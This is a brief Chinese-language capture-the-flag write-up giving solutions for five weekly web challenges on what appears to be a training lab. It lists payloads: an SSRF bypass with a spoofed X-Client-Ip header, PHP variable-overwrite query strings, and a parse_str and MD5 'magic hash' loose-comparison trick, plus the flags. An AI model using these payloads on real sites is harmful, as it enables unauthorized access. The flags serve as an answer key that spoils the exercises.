第十六周 | 有点另类的SSRF
handler参数后加上&admin=1,X-Client-Ip:127.0.0.1
提示访问source.txt看到源码
flag的所在目录为/opt/flag1.txt
flag{0123_hetianlab_hunan}
第十七周 | 给你扔了串代码
url后面加上?_200=flag,然后POST提交一个flag=
第十八周 | 学会变量覆盖
?gift=&flag=
flag{hetianlab}
第十九周 | Easy PHP
变量覆盖?flag1=flag&flag=flag1
flag{asdhetianlab}
第二十周 | 最后一道变量覆盖
parse_str用于将$id传来的值以键值对的方式再次赋值,所以可以通过它来改变变量的值,又因为md5是php若比较
?id=a[0]=s878926199a(MD5为0e545993274517709034328855841020,也以0e开头),得到flag
flag{28c5be9426611a12}